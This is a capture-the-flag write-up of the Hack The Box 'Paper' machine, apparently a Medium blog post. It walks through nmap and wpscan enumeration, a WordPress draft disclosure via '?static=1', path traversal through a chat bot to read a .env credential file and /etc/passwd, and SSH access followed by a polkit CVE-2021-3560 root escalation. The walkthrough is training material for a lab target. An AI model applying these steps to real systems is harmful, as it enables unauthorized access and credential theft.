Paper-Hack The Box

Paper-Hackthebox

Scope of the work

The scope of this machine is to retrieve the two flags as proof of exploitation.

  • user.txt
  • root.txt

HackTheBox has provided the following scope allowances:

  • Any tools or techniques are permitted in this engagement, however, we ask that you attempt manual exploitation first
  • Locate and report all vulnerabilities found
  • Submit the flags discovered to the dashboard
  • Only the IP address assigned to your machine is in scope

Reconnaissance

This machine is a medium boot2root machine IP: 10.10.11.143.

Running a nmap scan with -sC for default script scan and -sV for version scan

┌──(kali㉿kali)-[~/Desktop/htb/paper]
└─$ cat nmap/paper.nmap
# Nmap 7.92 scan initiated Mon Mar 14 04:28:53 2022 as: nmap -sC -sV -oA nmap/paper 10.10.11.143
Nmap scan report for 10.10.11.143
Host is up (0.33s latency).
Not shown: 997 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.0 (protocol 2.0)
| ssh-hostkey:
| 2048 10:05:ea:50:56:a6:00:cb:1c:9c:93:df:5f:83:e0:64 (RSA)
| 256 58:8c:82:1c:c6:63:2a:83:87:5c:2f:2b:4f:4d:c3:79 (ECDSA)
|_ 256 31:78:af:d1:3b:c4:2e:9d:60:4e:eb:5d:03:ec:a0:22 (ED25519)
80/tcp open http Apache httpd 2.4.37 ((centos) OpenSSL/1.1.1k mod_fcgid/2.3.9)
|_http-generator: HTML Tidy for HTML5 for Linux version 5.7.28
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: HTTP Server Test Page powered by CentOS
|_http-server-header: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_fcgid/2.3.9
443/tcp open ssl/http Apache httpd 2.4.37 ((centos) OpenSSL/1.1.1k mod_fcgid/2.3.9)
|_ssl-date: TLS randomness does not represent time
|_http-title: 400 Bad Request
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_fcgid/2.3.9
| tls-alpn:
|_ http/1.1
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=Unspecified/countryName=US
| Subject Alternative Name: DNS:localhost.localdomain
| Not valid before: 2021-07-03T08:52:34
|_Not valid after: 2022-07-08T10:32:34
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Mar 14 04:29:22 2022 -- 1 IP address (1 host up) scanned in 29.24 seconds
┌──(kali㉿kali)-[~/Desktop/htb/paper]
└─$

From the nmap scan result, we find three ports are open. the port are port 22,80 and 443 and the services running are ssh, httpand https.

There might be other ports open. so let’s run nmap for full port scan

┌──(kali㉿kali)-[~/Desktop/htb/paper]
└─$ cat nmap/all-port.nmap
# Nmap 7.92 scan initiated Mon Mar 14 04:32:17 2022 as: nmap -p- -oA nmap/all-port 10.10.11.143
Nmap scan report for 10.10.11.143
Host is up (0.086s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
443/tcp open https
# Nmap done at Mon Mar 14 04:37:58 2022 -- 1 IP address (1 host up) scanned in 341.63 seconds

Enumerating HTTP

Let’s enumerate the website that is running. After checking the sites there is nothing to display.

homepage

I run the gobuster in the background but I found nothing that picks my interest. So I decided to check the HTTP response.

Let’s run the curl command with the -I flag. -I flag includes the HTTP response headers in the output. The HTTP response headers can include things like server name, cookies, date of the document, HTTP version and more.

┌──(kali㉿kali)-[~/Desktop/htb/paper]
└─$ curl -I 10.10.11.143
HTTP/1.1 403 Forbidden
Date: Mon, 14 Mar 2022 11:09:15 GMT
Server: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_fcgid/2.3.9
X-Backend-Server: office.paper
Last-Modified: Sun, 27 Jun 2021 23:47:13 GMT
ETag: "30c0b-5c5c7fdeec240"
Accept-Ranges: bytes
Content-Length: 199691
Content-Type: text/html; charset=UTF-8

We can see that the server accepts requests with the domain “office.paper”, let’s add this domain to our hosts file

┌──(kali㉿kali)-[~/Desktop/htb/paper]
└─$ cat /etc/hosts | grep office
10.10.11.143 office.paper

Got a new webpage

The wappalyzer reveals that the website is running WordPress version 5.2.3. Let’s run the wpscan in the background. In the meantime, let's enumerate the website manually.

message

While enumerating I found a comment from Nick to Michael, stating to remove the secret content from drafts. However, for checking the drafts we need admin credentials, which we don’t have till now.

┌──(kali㉿kali)-[~/Desktop/htb/paper]
└─$ wpscan --url http://office.paper/ -e vp,vt,u -o web/wpscan
┌──(kali㉿kali)-[~/Desktop/htb/paper]
└─$ cat web/wpscan
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.20
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[+] URL: http://office.paper/ [10.10.11.143]
[+] Started: Mon Mar 14 04:43:33 2022
Interesting Finding(s):[+] Headers
| Interesting Entries:
| - Server: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_fcgid/2.3.9
| - X-Powered-By: PHP/7.2.24
| - X-Backend-Server: office.paper
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] WordPress readme found: http://office.paper/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] WordPress version 5.2.3 identified (Insecure, released on 2019-09-05).
| Found By: Rss Generator (Passive Detection)
| - http://office.paper/index.php/feed/, <generator>https://wordpress.org/?v=5.2.3</generator>
| - http://office.paper/index.php/comments/feed/, <generator>https://wordpress.org/?v=5.2.3</generator>
[+] WordPress theme in use: construction-techup
| Location: http://office.paper/wp-content/themes/construction-techup/
| Last Updated: 2021-07-17T00:00:00.000Z
| Readme: http://office.paper/wp-content/themes/construction-techup/readme.txt
| [!] The version is out of date, the latest version is 1.4
| Style URL: http://office.paper/wp-content/themes/construction-techup/style.css?ver=1.1
| Style Name: Construction Techup
| Description: Construction Techup is child theme of Techup a Free WordPress Theme useful for Business, corporate a...
| Author: wptexture
| Author URI: https://testerwp.com/
|
| Found By: Css Style In Homepage (Passive Detection)
|
| Version: 1.1 (80% confidence)
| Found By: Style (Passive Detection)
| - http://office.paper/wp-content/themes/construction-techup/style.css?ver=1.1, Match: 'Version: 1.1'

[i] No plugins Found.
[i] No themes Found.
[i] User(s) Identified:[+] prisonmike
| Found By: Author Posts - Author Pattern (Passive Detection)
| Confirmed By:
| Rss Generator (Passive Detection)
| Wp Json Api (Aggressive Detection)
| - http://office.paper/index.php/wp-json/wp/v2/users/?per_page=100&page=1
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)
[+] nick
| Found By: Wp Json Api (Aggressive Detection)
| - http://office.paper/index.php/wp-json/wp/v2/users/?per_page=100&page=1
| Confirmed By:
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)
[+] creedthoughts
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
[+] Finished: Mon Mar 14 04:43:55 2022
[+] Requests Done: 496
[+] Cached Requests: 40
[+] Data Sent: 129.417 KB
[+] Data Received: 207.426 KB
[+] Memory used: 295.867 MB
[+] Elapsed time: 00:00:21
┌──(kali㉿kali)-[~/Desktop/htb/paper]
└─$

Quick google search reveals that this version is vulnerable to CVE-2019–17671. This vulnerability allows an unauthenticated user to view the certain content. It is possible because the static query property is mishandled.
To do this we add the query ?static=1 to the link of the site. This gives us access to a page with the following content. You can have more information here

And we get the secret content Nick was mentioning, that tell us about new vhost and registration URL. Let's add the vhost in the/etc/hosts file

┌──(kali㉿kali)-[~/Desktop/htb/paper]
└─$ cat /etc/hosts | grep office
10.10.11.143 office.paper chat.office.paper

Going to the URL, we get the registration form. Let’s register ourselves.

registration form

Upon login, this account gives me access to several elements and in particular has a conversation with the various employees of the company. In this discussion, we learn that dwight has created a bot that helps the user to list the sales directory with thelist command, and with file command we can view the content inside the file.

general discussion

I start a private conversation with this bot and test some commands:

I’m using list and file command to get the content inside the directory. I tried the path traversal using ../ . Bingo, we have the list of files from the parent folder. There is a hubot directory in the parent directory, it must be its source code for the bot. Within the hubot directory, there is a .env file that picks my interest. This kind of directory generally contains environment variables and possibly credentials.

credentials

Now we have the credentials. We can try login into the chat system with these credentials but No luck there.

login as recyclops

I tried connecting to ssh but with the recyclops user and again no luck there. I read the content of the /etc/passwd file to get the available user list. I tried connecting via ssh to the dwight user and it worked.

┌──(kali㉿kali)-[~/Desktop/htb/paper]
└─$ ssh dwight@10.10.11.143
dwight@10.10.11.143's password:
Activate the web console with: systemctl enable --now cockpit.socket
Last login: Tue Feb 1 09:14:33 2022 from 10.10.14.23
[dwight@paper ~]$ id
uid=1004(dwight) gid=1004(dwight) groups=1004(dwight)
[dwight@paper ~]$

Privilege escalation

Now we have the shell. I start by using the linPeas script to have a first list of exploits. For that I upload the file, and execute it.

After analyzing the linPeas result, I found out that this machine is vulnerable to CVE-2021–3560 CVE-2021-3560 is an authentication bypass on polkit, which allows an unprivileged user to call privileged methods using DBus. I find a script that allows the exploitation and the creation of a root session.

linPeas result analysis
[dwight@paper ~]$ nano exploit.py   
[dwight@paper ~]$ python3 exploit.py
**************
Exploit: Privilege escalation with polkit - CVE-2021-3560
Exploit code written by Ahmad Almorabea @almorabea
Original exploit author: Kevin Backhouse
For more details check this out: https://github.blog/2021-06-10-privilege-escalation-polkit-root-on-linux-with-bug/
**************
[+] Starting the Exploit
id: ‘ahmed’: no such user
id: ‘ahmed’: no such user
id: ‘ahmed’: no such user

--------------SNIP--------------

The user.txt is located at dwight directory and root.txt is locate at root directory.

--

--

--

Cyber Security Enthusiast| CTF challenge solving | Python programmer

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

Is your Data Science team increasing your cyber exposure?

Investing in Data Security

Networking: What is a CSN?

ZKSpace Weekly Dev & Operations Report (3.7–3.11)

An explanation for TransLink’s ransomware story and recommendations for those who live in Vancouver

{UPDATE} [AR] Cube Hack Free Resources Generator

ZKSwap Will Launched Layer 2 Asset Migration Incentive Campaign, Deposit to ZKSwap Layer2 to share…

How to live with a brain bug in your brain

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Arjun Aryal

Arjun Aryal

Cyber Security Enthusiast| CTF challenge solving | Python programmer

More from Medium

DLL Hijacking

Bandung

Compromised — PG Walkthrough